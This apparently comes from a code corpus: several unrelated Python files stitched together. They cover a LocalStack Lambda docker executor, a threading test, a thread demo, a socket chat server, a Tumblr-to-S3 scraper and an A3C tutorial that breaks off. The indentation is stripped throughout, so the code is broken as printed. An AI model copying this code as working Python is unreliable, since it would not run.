exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.next_port = 1
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = str(self.next_port + self.port_offset)
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
self.next_port = (self.next_port + 1) % self.max_port
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# Make sure to keep the log line below, to ensure the log stream gets created
log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
# store logs to CloudWatch
_store_logs(func_details, log_output)
return result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[0]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
test_measuring_from_threads.py | import threading
import random
import time
from eqsn import EQSN
def test_measure_from_threads():
q_sim = EQSN()
def measure_or_hadamard(_id):
n = random.randrange(10, 20, 1)
for _ in range(n):
time.sleep(0.1)
q_sim.H_gate(_id)
nr_threads = 10
ids = [str(x) for x in range(nr_threads)]
for _id in ids:
q_sim.new_qubit(_id)
id1 = ids[0]
for c in ids:
if c != id1:
q_sim.cnot_gate(id1, c)
thread_list = []
for _id in ids:
t = threading.Thread(target=measure_or_hadamard, args=(_id,))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
q_sim.stop_all()
if __name__ == "__main__":
test_measure_from_threads()
exit(0)
|
threading_endTime.py | import threading
import time
def thread():
time.sleep(2)
print('---子线程结束---')
def main():
t1 = threading.Thread(target=thread)
t1.setDaemon(True)
t1.start()
t1.join(timeout=1) # 1、线程同步,主线程堵塞1s然后主线程结束,子线程继续执行
# 2、如果不设置timeout参数就等子线程结束主线程再结束
# 3、如果设置了setDaemon=True和timeout=1主线程等待1s后会强制杀死子线程,然后主线程结束
print('---主线程结束---')
if __name__ == '__main__':
main() |
server.py | from socket import *
import threading as th
from time import sleep
'''
Server functionality:
1) Main server listens to a port
2) When a connection is established it starts a new thread to host this client (the client gets unique id
3) Thread function executes until connection is done
4) Thread function first checks for any messages to be sent to the client and sends it if any,
the it suggests the client to send any messages (so the client is mostly waiting for data and handles either
messages or a request for its own message (client responds to the second request only)
5) Commends:
REG <alias><eol> (client-to-server. server responds with <id> or 0 if failed)
MSG <text><eol> (both directions)
RTT<eol> (server-to-client, request to talk)
TRM (client-to-server, client disconnects)
'''
'''
Message format:
{"from": from_alias, "to": to_alias, "from_id": from_id, "to_id": to_id, "message": "test message"}
'''
def debug(s): print(s + "\n")
class Server:
HOST = "localhost"
PORT = 8765
MAX_CLIENTS = 5
def __init__(self):
self.client_pool = {}
self.client_pool_lock = th.Lock()
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.bind((Server.HOST, Server.PORT))
self.server_stop = False
def thread_proc(self, connection, my_id):
debug("client handle thread started with id %d" % my_id)
with self.client_pool_lock:
data = self.client_pool[my_id]
while not self.server_stop:
''' first of all check for messages to send to the client '''
if len(data["messages"]) > 0:
with data["lock"]:
for m in data["messages"]:
self.send_message(connection, {"message": m})
data["messages"] = []
''' then check if the client has a message '''
self.request_for_message(connection)
msg = self.wait_for_message(connection)
if msg:
self.broadcast(my_id, {"message": msg})
else:
sleep(0.1)
continue
def broadcast(self, src_id, msg):
with self.client_pool_lock:
for dst_id, data in self.client_pool.items():
data["messages"].append(msg["message"])
def private(self, src_id, dst_id, msg):
with self.client_pool_lock:
self.client_pool[dst_id]["messages"].append(msg)
def send_message(self, conn, msg):
conn.send(bytes("MSG " + msg["message"] + "\n", "utf-8"))
def request_for_message(self, conn):
conn.send(bytes("RTT\n", "utf-8"))
def wait_for_message(self, conn):
data = str(conn.recv(1024), "utf-8")
if not data:
pass # connection is broken?
return ""
elif data[:3] == "NOP":
return ""
elif data[:3] == "MSG":
return data[4:]
else:
pass # incorrect command
def terminate(self, conn):
conn.send(bytes("TRM\n", "utf-8"))
def start(self):
self.socket.listen(Server.MAX_CLIENTS)
debug("server is listening on port %d" % Server.PORT)
self.latest_id = 0
self.server_stop = False
while not self.server_stop:
connection, address = self.socket.accept()
self.latest_id += 1
thread = th.Thread(target=self.thread_proc, args=(connection, self.latest_id))
data = {"thread": thread, "id": self.latest_id, "address": address, "messages": [], "lock": th.Lock()}
self.client_pool[self.latest_id] = data
thread.start()
def stop(self):
self.server_stop = True
for c in self.client_pool:
c["thread"].join()
if __name__ == "__main__":
Server().start()
"""
https://docs.python.org/3.5/library/socketserver.html?highlight=socketserver#module-socketserver
http://stackoverflow.com/questions/8627986/how-to-keep-a-socket-open-until-client-closes-it
""" |
scrape.py | import pytumblr
from threading import Thread
import requests
import logging
import json
from boto.s3.connection import S3Connection
import time
import sys
class Scrape():
def __init__(self, aws_access_key, aws_secret_key, s3_bucket, tumblr_api_key, tag, refresh_period=1.0):
self.tumblr_client = pytumblr.TumblrRestClient(tumblr_api_key)
s3_client = S3Connection(aws_access_key, aws_secret_key)
self.bucket = s3_client.get_bucket(s3_bucket)
# List the files in our bucket, find jsons and remove them, leaving the id, then setify it. That way we don't
# download the same file twice
self.scraped_ids = set([filename.key[:-5] for filename in self.bucket.get_all_keys() if filename.key[-5:]=='.json'])
self.tag = tag
self.refresh_period = refresh_period
self.scraping = False
def input_thread(self):
raw_input("")
self.scraping = False
def start(self):
logging.info("Starting scrape.")
self.scraping = True
i = 1
interrupt_thread = Thread(target=self.input_thread)
interrupt_thread.start()
while self.scraping:
loader = {0: '|', 1: '/', 2: '-', 3: '\\'}
sys.stdout.write('\r')
sys.stdout.flush()
sys.stdout.write("Scrape #" + str(i) + " " + loader[i % 4] + " Press any key to stop")
# Spin off a thread to get the posts. This doesn't technically need to be in a thread, but I wanted
# to future proof it in case I want to get multiple tags concurrently.
t = Thread(target=self.post_thread)
t.start()
t.join()
time.sleep(self.refresh_period)
i += 1
def stop(self):
sys.stdout.flush()
self.scraping = False
def post_thread(self):
response = self.tumblr_client.tagged(self.tag)
content_list = self.parse_content_urls(response)
image_threads = []
# Loop through the posts that got returned, then spin off threads to download the images associated with them.
for content in content_list:
image_threads.append(Thread(target=self.upload_content, args=(content,)))
image_threads[-1].start()
# Wait for all the images to download before we close the post thread.
for image_thread in image_threads:
image_thread.join()
def upload_content(self, content):
id = str(content[0])
post = content[1]
if id in self.scraped_ids:
return
if content[2] is not None:
img_url = content[2]
img_filename = img_url.split('/')[-1]
# We put the image in a directory with the post id in the directory name
image_key = self.bucket.new_key(id+'/'+img_filename)
r = requests.get(img_url)
if r.status_code == 200:
json_key = self.bucket.new_key(id + '.json')
json_key.set_contents_from_string(json.dumps(post))
image_key.content_type = r.headers['content-type']
image_key.set_contents_from_string(r.content)
else:
json_key = self.bucket.new_key(id + '.json')
json_key.set_contents_from_string(json.dumps(post))
def parse_content_urls(self, posts):
content = []
# If the post doesn't have one and only one photo in it, we will still save the json (for later), but won't
# download any photos.
for post in posts:
id = post['id']
if post['type'] == 'photo' and len(post['photos']) == 1:
img_url=post['photos'][0]['original_size']['url']
content.append((id, post, img_url))
else:
content.append((id, post, None))
return content |
tutorial_A3C.py | """
Asynchronous Advantage Actor Critic (A3C) with Continuous Action Space.
Actor Critic History
----------------------
A3C > DDPG (for continuous action space) > AC
Advantage
----------
Train faster and more stable than AC.
Disadvantage
-------------
Have bias.
Reference
----------
Original Paper: https://arxiv.org/pdf/1602.01783.pdf
MorvanZhou's tutorial: https://morvanzhou.github.io/tutorials/
MorvanZhou's code: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/experiments/Solve_BipedalWalker/A3C.py
Environment
-----------
BipedalWalker-v2 : https://gym.openai.com/envs/BipedalWalker-v2
Reward is given for moving forward, total 300+ points up to the far end.
If the robot falls, it gets -100. Applying motor torque costs a small amount of
points, more optimal agent will get better score. State consists of hull angle
speed, angular velocity, horizontal speed, vertical speed, position of joints
and joints angular speed, legs contact with ground, and 10 lidar rangefinder
measurements. There's no coordinates in the state vector.
Prerequisites
--------------
tensorflow 2.0.0a0
tensorflow-probability 0.6.0
tensorlayer 2.0.0
&&
pip install box2d box2d-kengz --user
To run
------
python tutorial_A3C.py --train/test
"""
import argparse
import multiprocessing
import threading
import time
import numpy as np
import gym
import tensorflow as tf
import tensorflow_probability as tfp
import tensorlayer as tl
from tensorlayer.layers import DenseLayer, InputLayer
tfd = tfp.distributions
tl.logging.set_verbosity(tl.logging.DEBUG)
np.random.seed(2)
tf.random.set_seed(2) # reproducible
# add arguments in command --train/test
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=True)
args = parser.parse_args()
##################### hyper parameters ####################
GAME = 'BipedalWalker-v2' # BipedalWalkerHardcore-v2 BipedalWalker-v2 LunarLanderContinuous-v2
LOG_DIR = './log' # the log file
N_WORKERS = multiprocessing.cpu_count() # number of workers accroding to number of cores in cpu
# N_WORKERS = 2 # manually set number of workers
MAX_GLOBAL_EP = 8 # number of training episodes
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10 # update global policy after several episodes
GAMMA = 0.99 # reward discount factor
ENTROPY_BETA = 0.005 # factor for entropy boosted exploration
LR_A = 0.00005 # learning rate for actor
LR_C = 0.0001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0 # will increase during training, stop training when it >= MAX_GLOBAL_EP
################### Asynchronous Advantage Actor Critic (A3C) ####################################
class ACNet(object):
def __init__(self, scope, globalAC=None):
self.scope = scope
self.save_path = './model'
w_init = tf.keras.initializers.glorot_normal(seed=None) # initializer, glorot=xavier
def get_actor(input_shape): # policy network
with tf.name_scope(self.scope):
ni = tl.layers.Input(input_shape, name='in')
nn = tl.layers.Dense(n_units=500, act=tf.nn.relu6, W_init=w_init, name='la')(ni)
nn = tl.layers.Dense(n_units=300, act=tf.nn.relu6, W_init=w_init, name='la2')(nn)
mu = tl.layers.Dense(n_units=N_A, act=tf.nn.tanh, W_init=w_init, name='mu')(nn)
sigma = tl.layers.Dense(n_units=N_A, act=tf.nn.softplus, W_init=w_init, name='sigma')(nn)
return tl.models.Model(inputs=ni, outputs=[mu, sigma], name=scope + '/Actor')
self.actor = get_actor([None, N_S])
self.actor.train() # train mode for Dropout, BatchNorm
def get_critic(input_shape): # we use Value-function here, but not Q-function.
with tf.name_scope(self.scope):
ni = tl.layers.Input(input_shape, name='in')
nn = tl.layers.Dense(n_units=500, act=tf.nn.relu6, W_init=w_init, name='lc')(ni)
nn = tl.layers.Dense(n_units=300, act=tf.nn.relu6, W_init=w_init, name='lc2')(nn)
v = tl.layers.Dense(n_units=1, W_init=w_init, name='v')(nn)
return tl.models.Model(inputs=ni, outputs=v, name=scope + '/Critic')
self.critic = get_critic([None, N_S])
self.critic.train() # train mode for Dropout, BatchNorm
@tf.function # convert numpy functions to tf.Operations in the TFgraph, return tensor
def update_global(
self, buffer_s, buffer_a, buffer_v_target, globalAC
): # refer to the global Actor-Crtic network for updating it with samples
''' update the global critic '''
with tf.GradientTape() as tape:
self.v = self.critic(buffer_s)
self.v_target = buffer_v_target
td = tf.subtract(self.v_target, self.v, name='TD_error')
self.c_loss = tf.reduce_mean(tf.square(td))
self.c_grads = tape.gradient(self.c_loss, self.critic.trainable_weights)
OPT_C.apply_gradients(zip(self.c_grads, globalAC.critic.trainable_weights)) # local grads applies to global net
# del tape # Drop the reference to the tape
''' update the global actor '''
with tf.GradientTape() as tape:
self.mu, self.sigma = self.actor(buffer_s)
self.test = self.sigma[0]
self.mu, self.sigma = self.mu * A_BOUND[1], self.sigma + 1e-5
normal_dist = tfd.Normal(self.mu, self.sigma) # no tf.contrib for tf2.0
self.a_his = buffer_a # float32
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * td # td is from the critic part, no gradients for it
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
self.a_grads = tape.gradient(self.a_loss, self.actor.trainable_weights)
OPT_A.apply_gradients(zip(self.a_grads, globalAC.actor.trainable_weights)) # local grads applies to global net
return self.test # for test purpose
@tf.function
def pull_global(self, globalAC): # run by a local, pull weights from the global nets
for l_p, g_p in zip(self.actor.trainable_weights, globalAC.actor.trainable_weights):
l_p.assign(g_p)
for l_p, g_p in zip(self.critic.trainable_weights, globalAC.critic.trainable_weights):
l_p.assign(g_p)
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
self.mu, self.sigma = self.actor(s)
with tf.name_scope('wrap_a_out'):
self.mu, self.sigma = self.mu * A_BOUND[1], self.sigma + 1e-5
normal_dist = tfd.Normal(self.mu, self.sigma) # for continuous action space
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=0), *A_BOUND)
return self.A.numpy()[0]
def save_ckpt(self): # save trained weights
tl.files.save_npz(self.actor.trainable_weights, name='model_actor.npz')
tl.files.save_npz(self.critic.trainable_weights, name='model_critic.npz')
def load_ckpt(self): # load trained weights
tl.files.load_and_assign_npz(name='model_actor.npz', network=self.actor)
tl.files.load_and_assign_npz(name='model_critic.npz', network=self.critic)
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.name = name
self.AC = ACNet(name, globalAC)
# def work(self):
def work(self, globalAC):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
# visualize Worker_0 during training
if self.name == 'Worker_0' and total_step % 30 == 0:
self.env.render()
s = s.astype('float32') # double to float
a = self.AC.choose_action(s)
s_, r, done, _info = self.env.step(a)
s_ = s_.astype('float32') # double to float
# set robot falls reward to -2 instead of -100
if r == -100: r = -2
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = self.AC.critic(s_[np.newaxis, :])[0, 0] # reduce dim from 2 to 0
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = (
np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
)
# update gradients on global network
self.AC.update_global(buffer_s, buffer_a, buffer_v_target.astype('float32'), globalAC)
buffer_s, buffer_a, buffer_r = [], [], []
# update local network from global network
self.AC.pull_global(globalAC)
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else: # moving average
GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
# print(
# self.name,
# "Episode: ",
# GLOBAL_EP,
# # "| pos: %i" % self.env.unwrapped.hull.position[0], # number of move
# '| reward: %.1f' % ep_r,
# "| running_reward: %.1f" % GLOBAL_RUNNING_R[-1],
# # '| sigma:', test, # debug
# # 'WIN ' * 5 if self.env.unwrapped.hull.position[0] >= 88 else '',
# )
print('{}, Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'\
.format(self.name, GLOBAL_EP, MAX_GLOBAL_EP, ep_r, time.time()-t0 ))
GLOBAL_EP += 1
break
if __name__ == "__main__":
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
A_BOUND[0] = A_BOUND[0].reshape(1, N_A)
A_BOUND[1] = A_BOUND[1].reshape(1, N_A)
# print(A_BOUND)
if args.train:
# ============================= TRAINING ===============================
t0 = time.time()
with tf.device("/cpu:0"):
OPT_A = tf.optimizers.RMSprop(LR_A, name='RMSPropA')
OPT_C = tf.optimizers.RMSprop(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'Worker_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
# start TF threading
worker_threads = []
for worker in workers:
# t = threading.Thread(target=worker.work)
